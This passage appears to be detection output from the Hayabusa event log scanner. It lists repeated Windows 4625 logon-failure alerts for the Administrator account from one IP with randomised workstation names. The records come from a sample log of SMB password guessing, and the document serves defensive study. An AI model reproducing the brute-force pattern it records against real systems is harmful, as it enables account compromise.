+09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2vEjOhJW9G3aIfV0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hyvCpW3aOZqCOldu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:51.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyhS2wAAkfmZuLll : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0bEh0KTMbbFtsfck : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mw9u61efa06vYv6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SAxij8QYLxxriIvu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HK2tbzICSpTrglud : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4rHJ70VrEwCQjSvL : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8qwZT66ExkdJDZaT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ezuHluj1fEC9KdQ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bXH5uDfo4WB6QEnQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yWvZjuZhnGcrelOM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vb6ePjmpA8ZwK1PW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:52.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7e1A9ZY20WM8oDn6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 71GKLnXqSEEuc1Fw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w0GsW0vDEkpRa1X0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0HH6zUUoL0qlfFC2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AG4pYsjob1iwlOc0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dNCX5tZ0nF1foTLW : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vO82Kb0kboVFuJy6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DptE2C8ZK3AxCb43 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.871 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NC8manvVP5pU8F3N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.926 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m00bI5welsLUWmwJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4shyxJk2PiH1TDlj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:53.014 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xZyN2WO3UVY0WQs6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.053 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oSQjAMckifap5r1k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qixqXiX0mVcuXe37 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.126 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gIfJCJz6l36WMeY9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SZxv5U7uoN6E8c8E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mlIfE0N32OQeWuNw : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nkZcjpTmHcJ0uX38 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GZfaHr2Yq6xkRjOI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jvy0EIiPSnom7pn3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TN9PUb0BgI3u8Xax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xCgz5BNpQgLgW0Xi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:53.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: po2GBdrXr3XtBsWR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O2rgo6jHcqu10IGY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MLblUOGzYzVA47E9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ysuA1xpYuAGRNONJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ksedziaGzXk5VNlS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.711 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: irIfGLQdhtRRGwuo : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YCf6WUjiS11hHqKT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1o0CTT7GsWfCWuHx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F6Jr8XrUsmTiSdol : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Buj66iuSkLEQdKnQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L1wOLI51HqfkgO6r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:53.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X4oe273WXOICzkwW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1c7nGezYNJ70jR6R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ajuZ09zGeuovCQLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z4k7xV7soNF4mHlz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CtdqW8zOw1GoQcvA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aY6FLi1edRZWrRZN : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ah1JoKfxJzQhCCVL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gIMOZRGcv4o33BWd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nmLyLJoVZz6fJ62I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aGufqEGD4hFf2XLM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7IEdKy2H5Agblpjt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:54.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XT9k8C05GVLBNPdl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5opHh8HelCXtR5Cm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K0dntDwYLmag9efo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.514 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UQfZOMFV9LtY7r2S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y01v38dTUIsJEZIv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pCP8x2QBZ6IvMEnf : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.739 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hgcbYjw3kKqlK7Di : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TFU97Tq3e7IWvSKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1hUCvaS1yM2FU9AE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8JInVlBqTSfT4J1s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EjXRQUGDKBZaMkw3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:54.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fZPXNxkGOrld5eCR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OBDhSrF7DZ1KBRa8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dQ7TKJOGibAVNoCH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.054 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZE1GARxx03m4FtEL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gf3VLLTxsK85bsrv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.123 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 58G6MFVbW55JZIV5 : IP Address: 192.168.198.149 : AuthPackage: 
